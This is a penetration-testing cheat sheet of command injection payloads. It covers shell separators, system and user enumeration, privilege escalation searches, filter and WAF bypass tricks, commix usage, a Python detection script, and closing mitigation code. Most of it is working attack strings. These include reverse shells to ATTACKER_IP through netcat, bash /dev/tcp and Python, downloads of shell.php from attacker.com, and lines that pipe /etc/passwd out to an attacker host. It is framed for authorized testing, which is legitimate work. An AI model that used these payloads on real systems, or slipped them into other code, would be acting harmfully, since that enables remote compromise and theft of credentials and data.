Command Injection Payloads

Collection of command injection payloads and bypass techniques for authorized penetration testing. Unless a section says otherwise the payloads assume the injected string reaches a POSIX shell (sh/bash) on the target; cmd.exe differs in its separators and comment syntax (see the Windows section), and several "bypass" tricks below only work on one platform.

Basic Command Injection

Simple Commands

# Basic command execution. Separator semantics matter when the injected
# command must run regardless of the original one: ";" always runs it,
# "&" backgrounds the first command, "&&" runs it only if the first command
# succeeded, "||" only if it failed, and "|" feeds the first command's
# output into it.
; ls
| ls
& ls
&& ls
|| ls

# Command chaining
; ls; whoami
| ls | cat
& ls & whoami
&& ls && whoami
|| ls || whoami

Information Gathering

# System information
; uname -a
; whoami
; id
; pwd
; ls -la
; cat /etc/passwd
; cat /etc/hosts
; cat /proc/version
; cat /proc/cpuinfo
; cat /proc/meminfo

Network Information

# Network interfaces and routes. ifconfig, route, arp and netstat come from
# net-tools and are often absent on current distributions; ip and ss are
# the replacements, so try both families.
; ifconfig
; ip addr
; ip route
; netstat -an
; ss -tuln
; arp -a
; route -n

Process Information

# Running processes. top and htop are interactive and need a tty, which an
# injected command normally does not have; use top in batch mode for a single
# snapshot. fuser does nothing without a file, socket or port to inspect.
; ps aux
; ps -ef
; top -b -n 1
; htop
; pstree
; lsof
; fuser -v FILE_OR_SOCKET

Advanced Command Injection

File Operations

# File reading
; cat /etc/passwd
; head /etc/passwd
; tail /etc/passwd
; more /etc/passwd
; less /etc/passwd
; grep root /etc/passwd
; awk '{print $1}' /etc/passwd
; sed -n '1,10p' /etc/passwd

Directory Enumeration (not to be confused with path/directory traversal, which is a separate vulnerability class)

# Directory listing
; ls -la /
; ls -la /home
; ls -la /var
; ls -la /tmp
; find / -name "*.txt" 2>/dev/null
; find / -name "*.log" 2>/dev/null
; find / -name "*.conf" 2>/dev/null

User Enumeration

# User information
; cat /etc/passwd
; cut -d: -f1 /etc/passwd
; awk -F: '{print $1}' /etc/passwd
; getent passwd
; id
; whoami
; groups
; last
; w
; who

Privilege Escalation

# SUID files
; find / -perm -4000 2>/dev/null
; find / -perm -u+s 2>/dev/null
; find / -perm -2000 2>/dev/null
; find / -perm -g+s 2>/dev/null

# Sudo capabilities. Use -n so sudo fails immediately instead of hanging on a
# password prompt when there is no tty; /etc/sudoers is normally readable
# only by root, so the cat/grep lines usually work only after escalation.
; sudo -n -l
; sudo -V
; cat /etc/sudoers
; grep -v '^#' /etc/sudoers

Bypass Techniques

Character Filtering Bypass

# Space bypass. With the default IFS only space, tab and newline split words,
# so ${IFS}, $IFS and a literal tab work. A literal newline or carriage
# return does NOT act as a separator here: newline ends the command (cat then
# runs with no argument and /etc/passwd is executed as the next command), and
# \r, form feed and vertical tab are not IFS characters, so the whole thing
# becomes one unknown command. Brace expansion and input redirection avoid
# the space altogether.
; cat${IFS}/etc/passwd
; cat$IFS/etc/passwd
; cat<tab>/etc/passwd
; {cat,/etc/passwd}
; cat</etc/passwd

# Quote bypass. Quotes and backslashes inside a word are removed by the shell
# before execution, so they can split a filtered keyword without changing the
# command. Backticks are NOT quoting: `/etc/passwd` is command substitution
# and tries to execute /etc/passwd, so cat `/etc/passwd` does not read the file.
; cat /etc/passwd
; cat "/etc/passwd"
; cat '/etc/passwd'
; c"a"t /e'tc'/pa\sswd

Command Filtering Bypass

# Case variation. Command lookup on Linux is case-sensitive, so Ls/LS simply
# fail with "command not found"; this only helps where the shell resolves
# names case-insensitively (cmd.exe on Windows) or when the case is folded
# back before execution, e.g. $(tr "[A-Z]" "[a-z]"<<<"LS").
; Ls
; LS
; lS
; Ls -La
; Ls -LA

# Encoding bypass. The encoded form is what has to pass the filter, so send a
# pre-computed base64 string; piping the plaintext through base64 on the
# target (echo "cat /etc/passwd" | base64 | base64 -d | sh) still submits the
# clear-text command and bypasses nothing.
; echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | sh
; echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | bash
; echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | /bin/sh

WAF Bypass

# Comment bypass. "#" is the only comment token in sh/bash; it discards the
# rest of the line, which neutralises anything the application appends after
# the injection point. /*, */ and <!-- are SQL/HTML comment tokens, not shell
# ones: in a shell "/*" and "*/" are globs that expand to the entries under /
# and "<!--" is an input redirection from a file named "!--", so they break
# the command rather than comment it out.
; cat /etc/passwd #

# Encoding bypass (URL-encoded forms). These only help when the application
# decodes the value before it reaches the shell; the double-encoded form needs
# a second decode, e.g. by a proxy or an extra framework layer, and is useless
# otherwise.
; cat /etc/passwd                        (plain)
%3b%20cat%20%2fetc%2fpasswd              (URL-encoded)
%0acat%20%2fetc%2fpasswd                 (newline %0a as the separator)
%253b%2520cat%2520%252fetc%252fpasswd    (double URL-encoded)

Platform-specific Payloads

Windows

# Basic commands. cmd.exe does not treat ";" as a command separator -- use
# "&", "&&", "||" or "|" instead; ";" only works when the injection lands in
# PowerShell.
& dir
& type C:\Windows\System32\drivers\etc\hosts
& whoami
& systeminfo
& ipconfig
& netstat -an
& tasklist
& wmic process list
& wmic service list
& reg query HKLM\SOFTWARE

Linux/Unix

# Basic commands
; ls
; cat /etc/passwd
; whoami
; uname -a
; ps aux
; netstat -an
; ss -tuln
; ifconfig
; ip addr
; route -n

macOS

# Basic commands. On macOS /etc/passwd lists only system accounts; real user
# accounts live in Directory Services (dscl . list /Users).
; ls
; cat /etc/passwd
; whoami
; uname -a
; ps aux
; netstat -an
; lsof -i
; ifconfig
; route -n
; system_profiler

Advanced Techniques

Reverse Shell

# Netcat reverse shell. "-e" exists only in the traditional/nmap ncat builds;
# the OpenBSD netcat shipped by Debian/Ubuntu has no -e, so use the mkfifo
# form there.
; nc -e /bin/sh ATTACKER_IP PORT
; nc -e /bin/bash ATTACKER_IP PORT
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f

# Bash reverse shell. /dev/tcp and the ">&" redirection are bash features; if
# the injected string is executed by /bin/sh (dash on Debian/Ubuntu) the
# redirection is a syntax error, so wrap it in bash -c so that bash parses it.
; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'

# Python reverse shell (the snippet runs under Python 2 and 3; on current
# systems there is often no "python" binary, so try python3 as well)
; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

File Upload

# Fetch a file onto the target. Note that "nc -l" listens on the target and
# waits for the attacker to connect and push the file -- it does not pull
# anything. urllib.urlretrieve is the Python 2 API; Python 3 moved it to
# urllib.request.
; wget http://attacker.com/shell.php
; curl -O http://attacker.com/shell.php
; nc -l -p 1234 > shell.php
; python3 -c "import urllib.request; urllib.request.urlretrieve('http://attacker.com/shell.php', 'shell.php')"

Data Exfiltration

# Send data to attacker
; cat /etc/passwd | nc ATTACKER_IP PORT
; cat /etc/passwd | curl -X POST -d @- http://attacker.com/collect
; cat /etc/passwd | base64 | nc ATTACKER_IP PORT
; tar -czf - /etc/passwd | nc ATTACKER_IP PORT

Testing Tools

Commix

# Basic scan
python3 commix.py -u "http://target.com/page.php?cmd=test"

# With POST data
python3 commix.py -u "http://target.com/page.php" --data="cmd=test"

# With cookies
python3 commix.py -u "http://target.com/page.php?cmd=test" --cookie="PHPSESSID=abc123"

# OS shell
python3 commix.py -u "http://target.com/page.php?cmd=test" --os-shell

Custom Script

import requests
import re

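def test_command_injection(url, param, payload, *, session=None, timeout=10):
    """POST *payload* in form field *param* to *url* and look for shell output.

    Detection is heuristic: the response body is searched for substrings that
    typically appear in the output of ``id``, ``ls -l``, ``cat /etc/passwd``
    or ``dir``. A hit is printed and ``True`` is returned; ``False`` only
    means no indicator was reflected, which does not rule out blind
    injection (confirm those with time delays or out-of-band callbacks).

    Args:
        url: Endpoint to post to.
        param: Name of the form field that receives *payload*.
        payload: Injection string, e.g. ``"; id"``.
        session: Optional object with a ``requests``-compatible ``post``
            method (a ``requests.Session`` or a test stub). Defaults to the
            ``requests`` module, so existing callers are unaffected.
        timeout: Seconds to wait for the response. Without it ``requests``
            blocks forever on an unresponsive host.

    Returns:
        ``True`` if an indicator was found in the response body, else ``False``.
    """
    client = requests if session is None else session
    response = client.post(url, data={param: payload}, timeout=timeout)

    # Substrings characteristic of command output. Some of them ("total",
    # "-rw-") are short enough to occur in ordinary page content, so treat a
    # hit as a lead to confirm manually, not as proof.
    indicators = (
        "root:",
        "bin/bash",
        "bin/sh",
        "uid=",
        "gid=",
        "groups=",
        "total",
        "drwx",
        "-rw-",
        "Directory of",
        "Volume in drive",
    )

    body = response.text
    if any(indicator in body for indicator in indicators):
        print(f"Command injection detected: {payload}")
        return True
    return False


# The name matches pytest's ``test_*`` discovery prefix but this is a helper
# with required arguments, not a test case; stop pytest from collecting it.
test_command_injection.__test__ = False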

# Test payloads
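# Placeholder target -- only point this at systems you are authorized to test.
TARGET_URL = "http://target.com/command.php"
TARGET_PARAM = "cmd"

# Separator-only probes: each should reflect recognisable output (a listing
# or a username) if the parameter reaches a shell. The probes differ only in
# the separator so that the one that survives the application's filtering
# can be identified.
payloads = [
    "; ls",
    "| ls",
    "& ls",
    "&& ls",
    "|| ls",
    "; whoami",
    "| whoami",
    "& whoami",
    "&& whoami",
    "|| whoami",
]

if __name__ == "__main__":
    # Guarded so that importing this module does not fire requests at the
    # target as a side effect.
    for payload in payloads:
        test_command_injection(TARGET_URL, TARGET_PARAM, payload)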

Prevention and Mitigation

Input Validation

import re
import shlex

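def validate_command(input_str: str) -> bool:
    """Return True if *input_str* is a single non-empty token of safe characters.

    Only ASCII letters, digits, ``-``, ``_`` and ``.`` are accepted. Because
    this is a whitelist, every shell metacharacter (``;``, ``|``, ``&``,
    ``$``, backticks, quotes, redirections, ``\\``), all whitespace, ``/``
    and non-ASCII text are rejected automatically; a separate blacklist
    would be dead code.

    What this does NOT do: it does not decide whether the token names a
    permitted program, and option-looking tokens such as ``-rf`` still pass.
    Pair it with an explicit allow-list of commands and pass arguments to
    ``subprocess`` as a list, never via ``shell=True``.

    Args:
        input_str: The untrusted token to check.

    Returns:
        True if the string is non-empty and every character is allowed,
        else False.
    """
    allowed_chars = frozenset(
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_."
    )
    # An empty token would later make subprocess.run([]) fail; reject it here.
    if not input_str:
        return False
    return set(input_str).issubset(allowed_chars)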

Command Execution

import subprocess
import shlex

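def safe_command_execution(command, *, allowed_commands=None):
    """Run *command* without a shell and return ``(stdout, stderr)``.

    The string is first checked with ``validate_command`` and then executed
    with ``shell=False`` so nothing in it is ever interpreted by a shell.
    Character filtering alone, however, does not make running an arbitrary
    binary safe -- the validated token could still be any program on PATH --
    so callers should pass an allow-list of permitted program names.

    Args:
        command: Untrusted command string (a single token under the current
            ``validate_command`` rules, which reject whitespace and quotes).
        allowed_commands: Optional collection of program names that may be
            executed. ``None`` keeps the historical behaviour of running any
            token that passes validation.

    Returns:
        ``(stdout, stderr)`` as text.

    Raises:
        ValueError: if the command fails validation, is empty, or is not in
            *allowed_commands*.
        FileNotFoundError: if the program does not exist.
        subprocess.TimeoutExpired: if it runs longer than 30 seconds.
    """
    if not validate_command(command):
        raise ValueError("Invalid command")

    # validate_command rejects whitespace and quotes, so shlex.split can only
    # yield one token here; it is kept so that argv is always built as a
    # list rather than handing a string to a shell.
    args = shlex.split(command)
    if not args:
        raise ValueError("Invalid command")

    if allowed_commands is not None and args[0] not in allowed_commands:
        raise ValueError(f"Command not permitted: {args[0]}")

    result = subprocess.run(args, capture_output=True, text=True, timeout=30)
    return result.stdout, result.stderr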

Sandboxing

import subprocess
import os
import tempfile

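def sandboxed_execution(command):
    """Run *command* in a throw-away working directory, without a shell.

    *command* is split into an argv list with ``shlex.split`` and executed
    with ``shell=False``, so shell metacharacters in the string (``;``,
    ``|``, ``$(...)``) reach the program as literal arguments instead of
    being interpreted. Never switch this to ``shell=True`` with a
    caller-supplied string: that is exactly the command injection the rest of
    this page describes. The working directory is a fresh temporary directory
    that is removed afterwards; it is passed via ``cwd=`` rather than
    ``os.chdir`` so the calling process's own cwd is left untouched and is
    never left pointing at a deleted directory.

    This is NOT a security boundary: the program still runs as the calling
    user with its privileges, environment and full filesystem/network access.
    Real sandboxing needs an OS mechanism (container, seccomp/AppArmor, a
    dedicated low-privilege user, ...).

    Args:
        command: Program and arguments as a single string.

    Returns:
        ``(stdout, stderr)`` as text.

    Raises:
        ValueError: if *command* is empty or has unbalanced quotes.
        FileNotFoundError: if the program does not exist.
        subprocess.TimeoutExpired: if it runs longer than 30 seconds.
    """
    import shlex  # local import: this listing's header only imports subprocess/os/tempfile

    args = shlex.split(command)
    if not args:
        raise ValueError("empty command")

    with tempfile.TemporaryDirectory() as temp_dir:
        result = subprocess.run(
            args,
            capture_output=True,
            text=True,
            timeout=30,
            cwd=temp_dir,
        )

    return result.stdout, result.stderr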

Testing Checklist

  • Test all input fields
  • Test with different HTTP methods
  • Test with different content types
  • Test with different command separators
  • Test with different quote types
  • Test with different encoding methods
  • Test with different bypass techniques
  • Test with different WAF bypasses
  • Test with different platform-specific commands
  • Test with different privilege escalation techniques
  • Test for blind injection with time delays (sleep 5 on Linux, ping -n 5 127.0.0.1 on Windows) or out-of-band callbacks when output is not reflected